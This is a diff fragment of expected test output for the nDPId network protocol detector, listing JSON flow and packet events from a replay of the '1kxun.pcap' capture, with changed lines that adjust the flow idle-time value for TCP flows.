00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1470104424738,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104424738,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6MAAIARUUPAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1470104425455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104425455,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6QAAIARUULAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} 
00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1470104425762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104425762,"pkt":"\/\/\/\/\/\/\/\/wKC7c+snCABFAAFZOwBAAEARM+XAqAoH\/\/\/\/\/\/YA9gABRUMe\/\/+fLaAAwKC7c+snwKgKBwAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+snQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDIzAAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqAoH\/\/8AAFBvcnQgOAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104425786,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0xkFAAEAGbFvAqAUQROn9hdFtAFBAFGHVDj7nf4AREAFpCQAAAQEIChoPxgTPHNz0"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1470104425786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104425786,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0xkFAAEAGbFvAqAUQROn9hdFtAFBAFGHVDj7nf4AREAFpCQAAAQEIChoPxgTPHNz0"} 
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1336,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1470104426276,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104426276,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6UAAIARUUHAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1470104426973,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1470104426973,"pkt":"TF4M6gNlYMVHBbyMCABFwABMyLEAAEARvv3AqAUQEf0afQB7AHsAOHvnIwIG7AAAJiAAAPbJEf0afdtKfo89Puc520qBhKZDx2jbSoGEtCSHfttKgew\/d58s"} 
@@ -546,8 +546,8 @@ 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104376017,"flow_last_seen":1470104433238,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430884,"flow_last_seen":1470104431294,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -555,14 +555,14 @@ 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104426992,"flow_last_seen":1470104427094,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104376301,"flow_last_seen":1470104422690,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391362,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} 
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104382242,"flow_last_seen":1470104432114,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1470104382241,"flow_last_seen":1470104432114,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104373232,"flow_last_seen":1470104432419,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378657,"flow_last_seen":1470104408662,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b030:214:100:c2a0:bbff:fe73:eb47","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -584,7 +584,7 @@ 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373232,"flow_last_seen":1470104430168,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1862,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
